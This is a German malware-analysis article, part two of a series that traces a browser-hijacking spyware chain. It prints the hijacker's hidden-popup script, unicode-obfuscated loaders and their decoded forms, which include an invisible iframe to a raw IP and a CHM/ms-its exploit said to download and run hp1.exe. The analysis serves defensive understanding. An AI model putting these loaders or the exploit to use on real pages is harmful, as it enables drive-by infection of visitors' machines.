Schädlingen auf der Spur, Teil 2
Seite 2: Ottos Startseite
Ottos Startseite wurde beim ersten Besuch auf
"http://default-homepage-network.com/start.cgi?new-hkcu".
umgesetzt. Beim nächsten Start des Internet Explorer lädt er Folgendes:
<html><head>
<title>Default Homepage Network</title>
</head>
<body>
[script language=javascript]
<!--
var agt=navigator.userAgent.toLowerCase();
var is_ie = (agt.indexOf("msie") != -1);
var is_aol = (agt.indexOf("aol") != -1);
if (!is_aol) {
self.moveTo(0,0);
self.resizeTo(screen.availWidth,screen.availHeight);
}
location.href=
"http://default-homepage-network.com/newspynotice.html"
if (!is_aol) {
var expdate = new Date((new Date()).getTime() + 600000);
if (document.cookie.indexOf("delayed") == -1) {
document.cookie=
"delayed=general; expires=" +
expdate.toGMTString() +
"; path=/;";
splashWin2 = window.open("",'y','fullscreen=1,\
toolbar=0,location=0,directories=0,\
status=0,menubar=0,scrollbars=0,resizable=0');
splashWin2.blur();
window.focus();
splashWin2.resizeTo(10,10);
splashWin2.moveTo(5000,5000);
splashWin2.location=
"http://object.passthison.com/aff/delayed/";
window.focus();
}
}
//-->
[/script]</body>
Hinter dem Verweis auf "newspynotice.html," verbirgt sich ein weiteres Juwel. Er zeigt ein großes, rotes Stoppschild und behauptet, dass der Rechner möglicherweise mit Spyware infiziert sei. Ob Otto denn bemerkt habe, dass sich seine Homepage geändert hat? Hat sich sein Rechner in letzter Zeit "koimsch" verhalten? (Warum können diese Malware-Clowns nichtmal richtig schreiben?) Ist das Internet "langsam oder stürzt ab"? Wenn ja, muss Otto nur auf einen Link auf dieser Seite klicken und sein Rechner "ist in wenigen Minuten wieder sauber und sicher". Da kommt Freude auf.
Im HTML-Code, der diesen "WICHTIGEN SICHERHEITSHINWEIS" präsentiert, ist eine kleine Überraschung versteckt:
<!-- 1. newobj1 -->
[script type="text/javascript"]
document.write('\u003c\u0073\u0063\u0072\u0069\u0070
...
\u0074\u003e')[/script]
<!-- 2. e1 -->
[script type="text/javascript"]
document.write('\u003c\u0069\u0066\u0072\u0061\u006d
...
\u0066\u0072\u0061\u006d\u0065\u003e')[/script]
Dekodiert ergibt der erste Teil:
[script language=javascript]
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML =
"<object
data=http://object.passthison.com/vu083003/newobject1.cgi\>";
oPopup.show(0,0,1,1,document.body);
}
showPopup();
[/script]
Und Teil 2:
[iframe
src="http://69.50.139.61/hp1/hp1.htm" width=1 height=1]
[/iframe]
Das erinnert an die Datei hp2.htm, die im ersten Teil dieses epischen Abenteuers geladen wurde. Dieselbe Site, dieselbe Methode und das Gleiche Resultat:
<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S.
(c) April 2004 SmartBot -->[script type="text/javascript"]
document.write('\u003c\u0074\u0065\u0078\u0074\u0061
...
\u000d\u000a\u000d\u000a')[/script]
Auch das ist nicht schwer zu dekodieren und ergibt:
<textarea id="code"
style="display:none;">
[object
data="ms-its:mhtml:\
file://C:\foo.mht!${PATH}/HP1.CHM::/hp1.htm"
type="text/x-scriptlet"]
[/object]
</textarea>
[script language="javascript"]
document.write(\
code.value.replace(/\${PATH}/g,location.href.substring\
(0,location.href.indexOf('hp1.htm'))));
[/script]
Wieder ein CHM-Exploit, der eine Datei namens hp1.exe herunterlädt und ausführt. Damit geht es wieder von vorne los – und glauben Sie mir: hp1.exe ist ein schweres Stück Arbeit. Bleiben Sie dran für Teil 3.
Anmerkung: Als ich begann, das alles zusammenzuschreiben, hatte ich keine Ahnung, wie tief dieses Kaninchenloch hinabführt. Ich glaubte wirklich, das gäbe nur einen etwas längeren Tagebucheintrag ... dann wurden es zwei ziemlich lange ... und jetzt ist klar, dass es doch drei werden -- mindestens. Aber ich werde versuchen den dritten Teil (und alle weiteren) schneller fertig zu bekommen.
http://www.labreatechnologies.com
Hier gehts zu: Schädlingen auf der Spur, Teil 3 (ju)
